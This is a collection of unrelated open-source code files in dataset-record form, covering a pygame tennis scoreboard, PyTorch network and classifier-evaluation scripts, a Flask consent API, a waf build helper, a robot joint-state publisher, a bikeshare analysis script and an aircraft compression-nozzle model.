box if the text is too long.\r\n width = max(200, self.text_surface.get_width()+10)\r\n self.rect.w = width\r\n\r\n def draw(self, screen):\r\n # Blit the text.\r\n screen.blit(self.text_surface, (self.rect.x+5, self.rect.y+5))\r\n # Blit the rect.\r\n pg.draw.rect(screen, self.colour, self.rect, 2)\r\n\r\n\r\n#Game class\r\nclass Game:\r\n #Init function to start the game variables\r\n def __init__(self):\r\n pg.init()\r\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\r\n pg.display.set_caption(TITLE)\r\n self.clock = pg.time.Clock()\r\n pg.key.set_repeat(500,100)\r\n #self.screen_scenario = WELCOME\r\n self.load_data()\r\n self.Game_Deuce = False\r\n self.Game_Tiebreaker = False\r\n #self.Game_Winner = False\r\n self.sets = DEFAULT_SETS\r\n self.serve = random.choice([1,2])\r\n\r\n #Draw text function that takes: Text to display, Font of text, Size of text, Colour of text, x coord, y coord, alignment within text box\r\n def draw_text(self, text, font_name, size, colour, x, y, align = \"nw\"):\r\n font = pg.font.Font(font_name, size)\r\n text_surface = font.render(text, True, colour)\r\n text_rect = text_surface.get_rect()\r\n if align == \"nw\":\r\n text_rect.topleft = (x, y)\r\n if align == \"ne\":\r\n text_rect.topright = (x, y)\r\n if align == \"sw\":\r\n text_rect.bottomleft = (x, y)\r\n if align == \"se\":\r\n text_rect.bottomright = (x, y)\r\n if align == \"n\":\r\n text_rect.midtop = (x, y)\r\n if align == \"s\":\r\n text_rect.midbottom = (x, y)\r\n if align == \"e\":\r\n text_rect.midright = (x, y)\r\n if align == \"w\":\r\n text_rect.midleft = (x, y)\r\n if align == \"center\":\r\n text_rect.center = (x, y)\r\n self.screen.blit(text_surface, text_rect)\r\n \r\n #Path for all the files required for the game\r\n def load_data(self):\r\n game_folder = path.dirname(__file__)\r\n img_folder = path.join(game_folder, \"img\")\r\n music_folder = path.join(game_folder, \"music\")\r\n fonts_folder = path.join(game_folder, \"fonts\")\r\n\r\n self.title_font = path.join(fonts_folder, \"LemonMilk.otf\")\r\n self.hud_font = path.join(fonts_folder, \"Impacted2.0.ttf\")\r\n self.text_font = path.join(fonts_folder, \"CaviarDreams_Bold.ttf\")\r\n self.points_font = path.join(fonts_folder, \"scoreboard.ttf\")\r\n self.dim_screen = pg.Surface(self.screen.get_size()).convert_alpha()\r\n\r\n #Function to start a new game\r\n def new(self):\r\n self.paused = False\r\n self.screen.fill(DARKGREEN)\r\n self.player1 = Player(PLAYER1, 1, DEFAULT_SETS, self.Game_Deuce, self.Game_Tiebreaker, False)\r\n self.player2 = Player(PLAYER2, 0, DEFAULT_SETS, self.Game_Deuce, self.Game_Tiebreaker, False)\r\n\r\n def input_box_update(self):\r\n input_box1 = InputBox(100,100,140,32)\r\n input_box2 = InputBox(100,100,140,32)\r\n input_boxes = [input_box1, input_box2]\r\n done = False\r\n\r\n while not done:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n done = True\r\n for box in input_boxes:\r\n box.handle_event(event)\r\n\r\n for box in input_boxes:\r\n box.update()\r\n\r\n self.screen.fill((30, 30, 30))\r\n for box in input_boxes:\r\n box.draw(self.screen)\r\n #Function to run the scoreboard\r\n def run(self):\r\n self.playing = True\r\n #pg.mixer.music.play(loops=-1)\r\n #pg.mixer.music.set_volume(BG_MUSIC_VOLUME)\r\n while self.playing:\r\n self.dt = self.clock.tick(FPS) / 1000\r\n self.events()\r\n if not self.paused:\r\n self.update()\r\n self.draw()\r\n\r\n #Quit function\r\n def quit(self):\r\n pg.quit()\r\n sys.exit()\r\n\r\n #Update function that gets called in a loop to then call all 
the other functions that need to be run\r\n def update(self):\r\n self.check_state()\r\n\r\n def check_state(self):\r\n if self.player1.score == self.player2.score == 3:\r\n self.Game_Deuce = True\r\n self.player1.advantage = self.player1.disadvantage = self.player2.advantage = self.player2.disadvantage = False\r\n if self.player1.score == 4 and self.player2.score == 3:\r\n self.player1.advantage = self.player2.disadvantage = True\r\n if self.player1.score == 3 and self.player2.score == 4:\r\n self.player1.disadvantage = self.player2.advantage = True\r\n\r\n #Draw function to blit all the text and scores onto the screen\r\n def draw(self):\r\n #Points box No.1\r\n pg.draw.rect(self.screen, BLACK, (POINTS_BOX_X_1, POINTS_BOX_Y_1, POINTS_BOX_WIDTH, POINTS_BOX_HEIGHT))\r\n #Points box No.2\r\n pg.draw.rect(self.screen, BLACK, (POINTS_BOX_X_2, POINTS_BOX_Y_2, POINTS_BOX_WIDTH, POINTS_BOX_HEIGHT))\r\n \r\n #If for how many sets there are:\r\n if self.sets == 5:\r\n #Sets box No.1\r\n pg.draw.rect(self.screen, BLACK, (SETS_BOX_X, SETS_BOX_Y, SETS_BOX_WIDTH, SETS_BOX_HEIGHT)) \r\n #Sets box No.2\r\n pg.draw.rect(self.screen, BLACK, (SETS_BOX_X, SETS_BOX_Y - SETS_BOX_HEIGHT - SETS_BOX_OFFSET, SETS_BOX_WIDTH, SETS_BOX_HEIGHT)) \r\n\r\n #Text\r\n self.draw_text(\"The National Championships\", self.text_font, 80, WHITE, WIDTH/2, 60, align = \"center\")\r\n self.draw_text(\"Points\", self.text_font, 40, WHITE, POINTS_BOX_X_1, POINTS_BOX_Y_2 - (5*POINTS_BOX_OFFSET), align=\"w\")\r\n\r\n #Points\r\n self.draw_text(str(POINTS[self.player1.score]), self.points_font, 180, YELLOW, POINTS_BOX_X_2, POINTS_BOX_Y_2)\r\n self.draw_text(str(POINTS[self.player2.score]), self.points_font, 180, YELLOW, POINTS_BOX_X_1, POINTS_BOX_Y_1)\r\n\r\n #Names\r\n self.draw_text(PLAYER1, self.text_font, 40, WHITE, POINTS_BOX_X_2 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET, POINTS_BOX_Y_2 + 20, align =\"w\")\r\n self.draw_text(PLAYER2, self.text_font, 40, WHITE, POINTS_BOX_X_1 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET, POINTS_BOX_Y_1 + 20, align =\"w\")\r\n\r\n #Server\r\n if self.serve == 1:\r\n self.screen.blit(SERVER_IMG, ((POINTS_BOX_X_2 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET),(POINTS_BOX_Y_2 + 50)))\r\n if self.serve == 2:\r\n self.screen.blit(SERVER_IMG, ((POINTS_BOX_X_2 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET),(POINTS_BOX_Y_1 + 50)))\r\n\r\n #Update the screen\r\n pg.display.flip()\r\n\r\n def events(self):\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n self.quit()\r\n if event.type == pg.KEYDOWN:\r\n #print(\"keypress\")\r\n if event.key == KILL_PROGRAM:\r\n self.quit()\r\n if event.key == PAUSE:\r\n self.paused = not self.paused\r\n if event.key == ADD_POINT_P1:\r\n self.player1.add_point()\r\n if self.player1.disadvantage or self.player2.disadvantage:\r\n self.player1.disadvantage = self.player2.disadvantage = False\r\n if event.key == ADD_POINT_P2:\r\n self.player2.add_point()\r\n\r\n def show_start_screen(self):\r\n self.screen.blit(MAIN_MENU_IMG, (0,0))\r\n self.draw_text(\"Welcome to the National Championships\", self.title_font, 60, WHITE, WIDTH/2, 60, align=\"center\")\r\n self.draw_text(\"Press any key to start setup process\", self.text_font, 45, WHITE, WIDTH/2, HEIGHT - 50, align=\"center\")\r\n pg.display.flip()\r\n self.wait_for_key()\r\n\r\n def show_setup_screen(self):\r\n self.screen.blit(SETUP_IMG, (0,0))\r\n self.draw_text(\"Enter names of Player 1 and Player 2\", self.title_font, 60, WHITE, WIDTH/2, 60, align = \"center\")\r\n pg.display.flip()\r\n self.wait_for_key()\r\n
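# A standalone sketch of the deuce/advantage rules that check_state()
# and the add_point handlers above maintain, assuming the same 0-based
# point indices (0 -> 0, 1 -> 15, 2 -> 30, 3 -> 40). `game_state` is a
# hypothetical helper for illustration, not a method of the Game class.
def game_state(p1, p2):
    # a game is won once a player has 4+ points and leads by two
    if max(p1, p2) >= 4 and abs(p1 - p2) >= 2:
        return 'game P1' if p1 > p2 else 'game P2'
    # from 40-40 onward the players cycle through deuce and advantage
    if p1 >= 3 and p2 >= 3:
        if p1 == p2:
            return 'deuce'
        return 'advantage P1' if p1 > p2 else 'advantage P2'
    return 'in play'

# e.g. game_state(3, 3) -> 'deuce'; game_state(4, 3) -> 'advantage P1'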
self.input_box_update()\r\n\r\n def wait_for_key(self):\r\n pg.event.wait()\r\n waiting = True\r\n while waiting:\r\n self.clock.tick(FPS)\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n waiting = False\r\n self.quit()\r\n if event.type == pg.KEYUP:\r\n waiting = False\r\n\r\n#Create game object\r\ng = Game()\r\ng.show_start_screen()\r\n\r\nwhile True:\r\n g.new()\r\n g.run()\r\n","repo_name":"alexandrosjones/Tennis-Scoring","sub_path":"Tennis Umpire System/new scoring main.py","file_name":"new scoring main.py","file_ext":"py","file_size_in_byte":9910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5090608641","text":"import numpy as np \nimport torch as t\nimport torch.nn as nn \nimport torch.nn.functional as F\n\nclass Head(nn.Module):\n\tdef __init__(self, body: 'torch | object representing network body',\n\t\t\t\t\t output_actions: 'int | actions available'):\n\t\tsuper(Head, self).__init__()\n\t\tself._body = body\n\t\tself._output_actions = output_actions\n\n\t\tself._create_head()\n\n\tdef _create_head(self):\n\t\tself._network = nn.Sequential(nn.Linear(in_features=self._body._fc_hidden_layer_size, out_features=self._output_actions))\n\n\tdef forward(self, X):\n\t\tX = self._body(X)\n\t\treturn self._network(X).view(-1, self._output_actions)","repo_name":"atlashugs/dqn_pytorch","sub_path":"dqn/network_head.py","file_name":"network_head.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38754005821","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"All *basic* python related details\"\nfrom waflib.Context import Context\nfrom waflib.Tools import python as pytools # for correcting a bug\n\nfrom .._requirements import REQ as requirements\n\npytools.PYTHON_MODULE_TEMPLATE = '''\nimport os, pkg_resources\nNAME = '%s'\nvers = None\ntry:\n vers = pkg_resources.get_distribution(NAME).version\nexcept:\n try:\n current_module = __import__(NAME)\n vers = getattr(current_module, '__version__', None)\n\n if vers is None:\n vers = getattr(current_module, 'version', None)\n\n if vers is None:\n vers = __import__(NAME+'.version').version\n\n if vers is not None:\n vers = getattr(vers, '__version__', vers)\n except:\n import subprocess\n cmd = [\"conda\", \"list\", \"-f\", NAME]\n try:\n try:\n ret = subprocess.check_output(cmd)\n except FileNotFoundError:\n ret = subprocess.check_output(cmd, shell = True)\n out = ret.strip().split(b\"\\\\n\")\n if len(out) == 4:\n vers = next((i for i in out[-1].split(b\" \")[1:] if i != b\"\"), None)\n if vers is not None:\n vers = vers.decode('utf-8')\n except:\n pass\nprint('unknown version' if vers is None else str(vers))\n'''\n\ndef hascompiler(cnf:Context):\n \"whether the waf file mentions c++\"\n return cnf.env.CC_NAME or cnf.env.CXX_NAME\n\ndef store(cnf:Context, flg:str):\n \"store more python flags\"\n if hascompiler(cnf):\n for item in 'PYEXT', 'PYEMBED':\n cnf.parse_flags(flg, uselib_store=item)\n\ndef toload(_:Context):\n \"returns python features to be loaded\"\n return 'python' if 'python' in requirements else ''\n\n@requirements.addcheck\ndef check_python(cnf, _, version):\n \"checks the python version when necessary\"\n if 'PYTHON_VERSION' in cnf.env:\n return\n cnf.check_python_version(tuple(int(val) for val in str(version).split('.')))\n if hascompiler(cnf):\n cnf.check_python_headers()\n\n@requirements.addcheck\ndef check_python_default(cnf, name, 
version):\n \"Adds a default requirement checker\"\n cond = 'ver >= num('+str(version).replace('.',',')+')'\n cnf.check_python_module(name.replace(\"python-\", \"\"), condition = cond)\n","repo_name":"depixusgenome/wafbuilder","sub_path":"_python/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25231763184","text":"from flask import request, Blueprint\nfrom api.domain.consent import Consent\nfrom marshmallow import ValidationError\nfrom api.constant.message_code import MessageCode\nfrom api.schema.add_consent_schema import AddConsentSchema\nfrom api.exception.service_exception import ServiceException\nfrom api.business_logic.consent_service import ConsentService\nfrom api.util import exception_util, header_util, service_util\nfrom api.business_logic.data_field_service import DataFieldService\nfrom api.schema.inquiry_consent_schema import InquiryConsentSchema\n\nconsent = Blueprint('consent', __name__)\n\n\"\"\"\nAuthor : Neda Peyrone\nCreate Date : 05-09-2021\nFile : consent_controller.py\nPurpose : -\n\"\"\"\n\n\n@consent.route(\"/addConsent\", methods=['POST'])\ndef add_consent():\n payload = request.get_json()\n\n try:\n header = header_util.build_header(request.headers)\n\n validated_data = AddConsentSchema().load(payload)\n consent = Consent(**validated_data)\n\n ConsentService().add_consent(header, consent)\n DataFieldService().add_data_fields(\n header,\n consent.consent_code,\n consent.consent_version,\n consent.data_fields\n )\n return service_util.build_status_response(MessageCode.SUCCESS.name, MessageCode.SUCCESS.value)\n except (ValidationError, ServiceException) as err:\n return exception_util.handler(err)\n\n\n@consent.route(\"/getActiveConsents\", methods=['POST'])\ndef get_consents():\n try:\n consents = ConsentService().get_active_consents()\n data_field_service = DataFieldService()\n\n for idx, consent in enumerate(consents):\n data_fields = data_field_service.get_consent_data_fields(\n consent.consent_code, consent.consent_version)\n consents[idx].data_fields = data_fields\n\n return service_util.build_server_response(MessageCode.SUCCESS, consents)\n except (ValidationError, ServiceException) as err:\n return exception_util.handler(err)\n\n\n@consent.route(\"/getActiveConsent\", methods=['POST'])\ndef get_active_consent():\n payload = request.get_json()\n\n try:\n header = header_util.build_header(request.headers)\n\n validated_data = InquiryConsentSchema().load(payload)\n criteria = Consent(**validated_data)\n\n consent = ConsentService().get_active_consent(criteria)\n data_fields = DataFieldService().get_consent_data_fields(\n consent.consent_code, consent.consent_version)\n consent.data_fields = data_fields\n\n return service_util.build_server_response(MessageCode.SUCCESS, consent)\n except (ValidationError, ServiceException) as err:\n return exception_util.handler(err)\n","repo_name":"cucpbioinfo/SmartDataTrust","sub_path":"api/controller/consent_controller.py","file_name":"consent_controller.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40536787055","text":"import logging; logger = logging.getLogger(\"morse.\"+ __name__)\n\nfrom morse_helpers import adapters\nfrom sensor_msgs.msg import JointState\n\n\nclass ArmStatePublisherForKLWR(adapters.ROSPublisher):\n\n ros_class = JointState\n NUM_JOINTS = 7\n\n def default(self, 
ci='unused'):\n\n message = JointState()\n message.header = self.get_ros_header()\n \n message.name = [''] * self.NUM_JOINTS\n message.position = [0] * self.NUM_JOINTS\n message.velocity = [0] * self.NUM_JOINTS\n message.effort = [0] * self.NUM_JOINTS\n \n # Define name used to export joints\n base_name = \"kuka_joint_\"\n \n for i in range(7):\n message.name[i] = base_name + (\"%d\" % (i+1) )\n message.position[i] = self.data[ \"kuka_\" + (\"%d\" % (i+1) ) ]\n\n self.publish(message)\n","repo_name":"dgerod/robots-in-morse-using-ros","sub_path":"robots/klwr_robot/klwr_morse/morse/simple_simulation/src/simple_simulation/runtime/middleware/state_publisher.py","file_name":"state_publisher.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72014202435","text":"import pandas as pd\r\nimport datetime as dt\r\nimport calendar\r\nimport numpy as np\r\nfrom time import time\r\n\r\nCITY_DATA = { 'Chicago': 'chicago.csv',\r\n 'New York': 'new_york_city.csv',\r\n 'Washington': 'washington.csv' }\r\nprint(\"A Wonderful day to you great Mentor!\")\r\n\r\n\r\ndef load_data(city, month, day):\r\n while True:\r\n try:\r\n # load data file into a dataframe\r\n City = str(input(\" Would you like to see data for Chicago, New York, or Washington? \\n\")).strip()\r\n df = pd.DataFrame(pd.read_csv(CITY_DATA[City]))\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. city: Chicago) \")\r\n else:\r\n break\r\n # convert the Start Time column to datetime\r\n df['Start Time'] = pd.to_datetime(df['Start Time'], format='%Y/%m/%d %H:%M:%S')\r\n\r\n # extract month and day of week from Start Time to create new columns\r\n df['month'] = pd.DatetimeIndex(df['Start Time']).month_name()\r\n df['day_of_week'] = pd.DatetimeIndex(df['Start Time']).day_name()\r\n\r\n filter_words = ['month', 'day', 'both']\r\n\r\n while True:\r\n try:\r\n filter_option = str(input(\" How would you like your data filtered?\\n please enter any of the options given below:\\n month\\n day\\n both \\n\"))\r\n\r\n if filter_option == 'month':\r\n while True:\r\n try:\r\n month1 = str(input(\" Please choose a month between January and June. Ensure to begin with a 'Capital letter'.(e.g. January)\\n\"))\r\n if month1 != 'both':\r\n # use the index of the months list to get the corresponding int\r\n months = ['January', 'February', 'March', 'April', 'May', 'June']\r\n month = months.index(month1)\r\n df = df[df['Start Time'].dt.month == month + 1]\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. January)\\n \")\r\n else:\r\n break\r\n\r\n elif filter_option == 'day':\r\n while True:\r\n try:\r\n day1 = input(\"Please enter a day of your choice. All days must begin with a capital letter. (e.g. Monday)\\n\")\r\n # filter by day of week if applicable\r\n if day1 != 'both':\r\n # filter by day of week to create the new dataframe\r\n days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\r\n day = days.index(day1) # validates the day name; raises ValueError on bad input\r\n # dt.day is the day of the month, so filter on the day-name column instead\r\n df = df[df['day_of_week'] == day1]\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. 
Monday)\\n \")\r\n else:\r\n break\r\n\r\n elif filter_option == 'both':\r\n while True:\r\n try:\r\n month1 = input(\"Please choose a month between January and June. Ensure to begin with a 'Capital letter'.(e.g. January)\\n\")\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. January)\\n \")\r\n else:\r\n break\r\n while True:\r\n try:\r\n day1 = input(\"Please enter a day of your choice. All days must begin with a capital letter. (e.g. Monday)\\n\")\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. Monday)\\n \")\r\n else:\r\n break\r\n if month1 != 'all' and day1 != 'all':\r\n months = ['January', 'February', 'March', 'April', 'May', 'June']\r\n days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\r\n month = months.index(month1)\r\n day = days.index(day1)\r\n df = df[(df['Start Time'].dt.month == month + 1) & (df['day_of_week'] == day1)]\r\n else:\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a lower case (e.g. month, day or both) \")\r\n if (filter_option not in filter_words):\r\n continue\r\n\r\n\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a lower case (e.g. month, day or both) \")\r\n if (filter_option not in filter_words):\r\n continue\r\n else:\r\n break\r\n return df\r\ndf = load_data('city', 'month', 'day')\r\nprint(\"Here are the data statistics you have requested....\")\r\n# print value counts for each user type\r\nuser_types = pd.Series(df['User Type'].value_counts())\r\nprint(\"This is the user analysis \\n{} :\".format(user_types))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\n# extract the hour from Start Time to create a new column\r\ndf['hour'] = pd.DatetimeIndex(df['Start Time']).hour\r\nMost_popular_hour = pd.DataFrame(df['hour']).mode()\r\n\r\nprint(\"The Most common hour is \\n{} \".format(Most_popular_hour))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\n# extract day from the Start Time column to create a day column\r\ndf['day'] = pd.DatetimeIndex(df['Start Time']).day_name()\r\n# find the most common start day of the week\r\npopular_day = pd.DataFrame(df['day']).mode()\r\n\r\nprint(\"The Most Frequent Start Day of week:\\n{} \".format(popular_day))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n# extract month and day of week from Start Time to create new columns\r\ndf['month'] = pd.DatetimeIndex(df['Start Time']).month_name()\r\nMost_popular_month = pd.Series(df['month']).mode()\r\n\r\nprint(\"The Most common month is:\\n{}\".format(Most_popular_month))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\nMost_popular_station = pd.Series(df['Start Station']).mode()\r\n\r\nprint(\"The most common start station is:\\n{}\".format(Most_popular_station))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\nMost_popular_end_station = pd.Series(df['End Station']).mode()\r\n\r\nprint(\"The most common end station is:\\n{}\".format(Most_popular_end_station))\r\nprint(\"computing the next data statistics.....\")\r\n\r\nMost_popular_trip_duration = pd.Series(df['Trip Duration']).mode()\r\nprint(\"The most common Trip duration are:\\n{}\".format(Most_popular_trip_duration))\r\n\r\nprint(\"computing the next data statistics.....\")\r\ndf['day_of_week1'] = 
pd.DatetimeIndex(df['Start Time']).day_name()\r\nbb = df['day_of_week1'].mode()\r\nprint(\"The most common day of the week is :\\n{} \".format(bb))\r\n\r\nprint(\"processing the next data....\")\r\n\r\ncolumns = ['Start Station', 'End Station']\r\ndf1 = pd.DataFrame(df[:], columns=columns).mode()\r\n\r\nprint(\"The most common trip from start to end is :\\n{} \".format(df1))\r\n\r\nprint(\"processing the next data....\")\r\n\r\nTotal_duration = np.sum(df['Trip Duration'])\r\nAverage_Total_duration = np.mean(df['Trip Duration'])\r\nprint(\"The total trip duration is:{} and the average of the durations is : {}\".format(Total_duration, Average_Total_duration))\r\nprint(\"processing the next data....\")\r\n\r\nGender_counts = pd.Series(df['Gender'].value_counts())\r\nprint(\"This is the count according to the gender:\\n {}\".format(Gender_counts))\r\nprint(\"processing the next data....\")\r\n\r\nMost_common_Birth_year = pd.Series(df['Birth Year']).mode()\r\nprint(\"The most common birth year is:\\n \", Most_common_Birth_year)\r\n\r\n(a,b) = (0,5)\r\nwhile True:\r\n if b>df.shape[0]:\r\n b = df.shape[0]+1\r\n print(df.iloc[a:b,:])\r\n a+=5\r\n if a>df.shape[0]:\r\n break\r\n b+=5\r\n CD = input(\"Do you want more data?\\n Enter yes or no\\n\").lower().strip()\r\n if CD == 'no':\r\n break\r\n","repo_name":"Hassanolowofela/wejapa-bikeshare-project","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38836386943","text":"## @ingroup Components-Energy-Converters\n# Compression_Nozzle.py\n#\n# Created: Jul 2014, A. Variyar\n# Modified: Jan 2016, T. MacDonald\n# Sep 2017, P. Goncalves\n# Jan 2018, W. Maier\n# Aug 2018, T. 
MacDonald\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\nimport SUAVE\n\n# python imports\nfrom warnings import warn\n\n# package imports\nimport numpy as np\n\nfrom SUAVE.Components.Energy.Energy_Component import Energy_Component\nfrom SUAVE.Methods.Propulsion.shock_train import shock_train\n\n# ----------------------------------------------------------------------\n# Compression Nozzle Component\n# ----------------------------------------------------------------------\n## @ingroup Components-Energy-Converters\nclass Compression_Nozzle(Energy_Component):\n \"\"\"This is a nozzle component intended for use in compression.\n Calling this class calls the compute function.\n\n Assumptions:\n Pressure ratio and efficiency do not change with varying conditions.\n Subsonic or choked output.\n\n Source:\n https://web.stanford.edu/~cantwell/AA283_Course_Material/AA283_Course_Notes/\n \"\"\"\n\n def __defaults__(self):\n \"\"\"This sets the default values for the component to function.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\"\n #setting the default values\n self.tag = 'Nozzle'\n self.polytropic_efficiency = 1.0\n self.pressure_ratio = 1.0\n self.pressure_recovery = 1.0\n self.compressibility_effects = False\n self.inputs.stagnation_temperature = 0.0\n self.inputs.stagnation_pressure = 0.0\n self.outputs.stagnation_temperature = 0.0\n self.outputs.stagnation_pressure = 0.0\n self.outputs.stagnation_enthalpy = 0.0\n self.compression_levels = 0.0\n self.theta = 0.0\n \n def compute(self,conditions):\n \"\"\" This computes the output values from the input values according to\n equations from the source.\n\n Assumptions:\n Constant polytropic efficiency and pressure ratio\n Adiabatic\n\n Source:\n https://web.stanford.edu/~cantwell/AA283_Course_Material/AA283_Course_Notes/\n\n Inputs:\n conditions.freestream.\n isentropic_expansion_factor [-]\n specific_heat_at_constant_pressure [J/(kg K)]\n pressure [Pa]\n gas_specific_constant [J/(kg K)]\n self.inputs.\n stagnation_temperature [K]\n stagnation_pressure [Pa]\n\n Outputs:\n self.outputs.\n stagnation_temperature [K]\n stagnation_pressure [Pa]\n stagnation_enthalpy [J/kg]\n mach_number [-]\n static_temperature [K]\n static_enthalpy [J/kg]\n velocity [m/s]\n\n Properties Used:\n self.\n pressure_ratio [-]\n polytropic_efficiency [-]\n pressure_recovery [-]\n \"\"\"\n\n #unpack from conditions\n gamma = conditions.freestream.isentropic_expansion_factor\n Cp = conditions.freestream.specific_heat_at_constant_pressure\n Po = conditions.freestream.pressure\n Mo = conditions.freestream.mach_number\n R = conditions.freestream.gas_specific_constant\n\n #unpack from inputs\n Tt_in = self.inputs.stagnation_temperature\n Pt_in = self.inputs.stagnation_pressure\n\n #unpack from self\n pid = self.pressure_ratio\n etapold = self.polytropic_efficiency\n eta_rec = self.pressure_recovery\n compressibility_effects = self.compressibility_effects\n\n #Method to compute the output variables\n\n #--Getting the output stagnation quantities\n Pt_out = Pt_in*pid*eta_rec\n Tt_out = Tt_in*(pid*eta_rec)**((gamma-1)/(gamma*etapold))\n ht_out = Cp*Tt_out\n\n if compressibility_effects :\n\n # Checking for Mach numbers below/above 1.0\n i_low = Mo <= 1.0\n i_high = Mo > 1.0\n\n #initializing the arrays\n Mach = np.ones_like(Pt_in)\n T_out = np.ones_like(Pt_in)\n Mo = Mo * np.ones_like(Pt_in)\n 
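# i_low: subsonic inlet, isentropic relations give the exit Mach number and static temperature\n # i_high: supersonic inlet, normal-shock relations give the post-shock Mach number, static temperature and stagnation-pressure loss\n 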
Pt_out = np.ones_like(Pt_in)\n P_out = np.ones_like(Pt_in)\n\n #-- Inlet Mach <= 1.0, isentropic relations\n Pt_out[i_low] = Pt_in[i_low]*pid\n Mach[i_low] = np.sqrt( (((Pt_out[i_low]/Po[i_low])**((gamma[i_low]-1.)/gamma[i_low]))-1.) *2./(gamma[i_low]-1.) ) \n T_out[i_low] = Tt_out[i_low]/(1.+(gamma[i_low]-1.)/2.*Mach[i_low]*Mach[i_low])\n\n #-- Inlet Mach > 1.0, normal shock\n Mach[i_high] = np.sqrt((1.+(gamma[i_high]-1.)/2.*Mo[i_high]**2.)/(gamma[i_high]*Mo[i_high]**2-(gamma[i_high]-1.)/2.))\n T_out[i_high] = Tt_out[i_high]/(1.+(gamma[i_high]-1.)/2*Mach[i_high]*Mach[i_high])\n Pt_out[i_high] = pid*Pt_in[i_high]*((((gamma[i_high]+1.)*(Mo[i_high]**2.))/((gamma[i_high]-1.)*Mo[i_high]**2.+2.))**(gamma[i_high]/(gamma[i_high]-1.)))*((gamma[i_high]+1.)/(2.*gamma[i_high]*Mo[i_high]**2.-(gamma[i_high]-1.)))**(1./(gamma[i_high]-1.))\n P_out[i_high] = Pt_out[i_high]*(1.+(gamma[i_high]-1.)/2.*Mach[i_high]**2.)**(-gamma[i_high]/(gamma[i_high]-1.))\n else:\n Pt_out = Pt_in*pid*eta_rec\n \n # in case pressures go too low\n if np.any(Pt_out Loading models...\")\n classifiers = {}\n\n torchvision_model_zoo_archs = ['densenet121', 'densenet169', 'densenet201', 'densenet161', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn', 'vgg19', 'vgg19_bn']\n\n for name in torchvision_model_zoo_archs:\n model = models.__dict__[name](pretrained=True)\n if len(name) < 20:\n name = name + ('.'*(20 - len(name)))\n classifiers[name] = model.to(device).eval()\n print(\"=> Model '{}' loaded.\".format(name))\n\n if len(args.resnets_path) > 0:\n for path in glob.glob(os.path.join(args.resnets_path,'*')):\n name = path.split('/')[-1].split('.')[0]\n if len(name) < 20:\n name = name + ('.'*(20 - len(name)))\n classifiers[name] = models.resnet50()\n classifiers[name] = torch.nn.DataParallel(classifiers[name])\n checkpoint = torch.load(path)\n classifiers[name].load_state_dict(checkpoint['state_dict'])\n classifiers[name].to(device).eval()\n print(\"=> Checkpoint found at '{}'\\n=> Model '{}' loaded.\".format(path, name))\n\n ## data loader without normalization\n data_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(os.path.join(args.data, 'val'), transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n ])),\n batch_size=args.batch_size, shuffle=False, num_workers=args.workers, pin_memory=False)\n\n agg_results = {}\n if args.toy:\n agg_results['zero'] = confuse(os.path.join(args.log_path, 'zero'), {'special': 'zero'}, classifiers, data_loader)\n agg_results['one'] = confuse(os.path.join(args.log_path, 'one'), {'special': 'one'}, classifiers, data_loader)\n agg_results['random56'] = confuse(os.path.join(args.log_path,'random56'), {'special': 'random56'}, classifiers, data_loader)\n agg_results['random224'] = confuse(os.path.join(args.log_path, 'random224'), {'special': 'random224'}, classifiers, data_loader)\n\n for path in glob.glob(os.path.join(args.casms_path, '*')):\n model = load_model(path)\n agg_results[model['name']] = confuse(os.path.join(args.log_path, model['name']), model, classifiers, data_loader)\n\n 